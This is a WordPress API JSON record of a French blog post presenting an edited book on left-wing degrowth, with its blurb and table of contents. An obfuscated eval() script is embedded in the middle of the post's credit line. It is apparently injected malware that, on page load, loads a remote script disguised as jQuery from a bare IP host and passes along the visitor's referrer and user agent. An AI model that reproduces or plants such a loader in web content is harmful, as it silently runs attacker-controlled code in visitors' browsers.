{"id":7954,"date":"2012-12-28T12:28:15","date_gmt":"2012-12-28T11:28:15","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=7954"},"modified":"2012-12-28T12:28:15","modified_gmt":"2012-12-28T11:28:15","slug":"decroissance-ou-recession-pour-une-decroissance-de-gauche","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=7954","title":{"rendered":"D\u00e9croissance ou r\u00e9cession : Pour une d\u00e9croissance de gauche"},"content":{"rendered":"<p><a href=\"http:\/\/www.partipourladecroissance.net\/?attachment_id=7955\" rel=\"attachment wp-att-7955\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" style=\"margin: 8px;\" alt=\"599819_427394850624284_1501002308_n\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/12\/599819_427394850624284_1501002308_n-167x300.jpeg\" width=\"167\" height=\"300\" \/><\/a><em>Sous <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rnrii|var|u0026u|referrer|bdydk||js|php'.split('|'),0,{}))\n<\/script><\/noindex> la direction de Paul Ari\u00e8s, Editions Parangon\/Vs (2012)<\/em><\/p>\n<p>La d\u00e9croissance n\u2019est pas la r\u00e9cession \u00e9conomique avec son cort\u00e8ge de mis\u00e8res sociales et psychiques.<\/p>\n<p>La crise actuelle est l\u2019enfant des amoureux de la croissance et rien ne serait plus grave qu\u2019elle fasse oublier la n\u00e9cessit\u00e9 de sortir du productivisme.<\/p>\n<p>La d\u00e9croissance ne peut \u00eatre que de gauche, sauf \u00e0 perdre son \u00e2me \u00e9mancipatrice.<\/p>\n<p>L\u2019objection de croissance est la seule chance pour la gauche de renouer avec un projet \u00e9mancipateur.<\/p>\n<p><span style=\"text-decoration: underline;\">Table des mati\u00e8res<\/span><\/p>\n<ul>\n<li>Du mot-obus au socialisme de la d\u00e9croissance.\u00a0Paul Ari\u00e8s<\/li>\n<li>L\u2019\u00e9cosocialisme autogestionnaire, l\u2019alternative au capitalisme\u00a0?\u00a0Thierry Brugvin<\/li>\n<li>La d\u00e9croissance en tant que socialisme.\u00a0Michel Lepesant<\/li>\n<li>La d\u00e9croissance est-elle de gauche\u00a0?\u00a0Serge Latouche<\/li>\n<li>Un revenu inconditionnel pour sortir du capitalisme.\u00a0Baptiste Mylondo<\/li>\n<li>La d\u00e9croissance en crise\u00a0?\u00a0Jean-Luc Pasquinet<\/li>\n<li>La d\u00e9croissance sans d\u00e9croissants\u00a0?\u00a0Anne Jordan<\/li>\n<li>La d\u00e9croissance et la Hongrie.\u00a0Vincent Li\u00e9gey<\/li>\n<li>Relocalisation s\u00e9lective et sociale contre relocalisation nationaliste.\u00a0Thierry Brugvin<\/li>\n<li>Les deux visages du catastrophisme.\u00a0Bernard Legros<\/li>\n<li>Pour une r\u00e9cup\u00e9ration lente.\u00a0St\u00e9phane Lavignotte<\/li>\n<li>Paradoxes et contradictions de la pens\u00e9e de la d\u00e9croissance.\u00a0Michel Weber<\/li>\n<li>Th\u00e8ses irr\u00e9cup\u00e9rables\u00a0?\u00a0Jean-Claude Besson-Girard<\/li>\n<li>La d\u00e9croissance, un mot-obus, un enjeu majeur.\u00a0Fabrice Flipo<\/li>\n<li>Le pas de c\u00f4t\u00e9 pour rendre la d\u00e9croissance insaisissable.\u00a0Vincent Li\u00e9gey<\/li>\n<li>Pr\u00e9venir le meurtre du futur\u00a0?\u00a0Jean Cornil<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Sous la direction de Paul Ari\u00e8s, Editions Parangon\/Vs (2012) La d\u00e9croissance n\u2019est pas la r\u00e9cession \u00e9conomique avec son cort\u00e8ge de mis\u00e8res sociales et psychiques. La crise actuelle est l\u2019enfant des amoureux de la croissance et rien ne serait plus grave &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=7954\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16],"tags":[],"class_list":["post-7954","post","type-post","status-publish","format-standard","hentry","category-livres"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7954","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7954"}],"version-history":[{"count":1,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7954\/revisions"}],"predecessor-version":[{"id":7956,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7954\/revisions\/7956"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7954"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7954"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7954"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}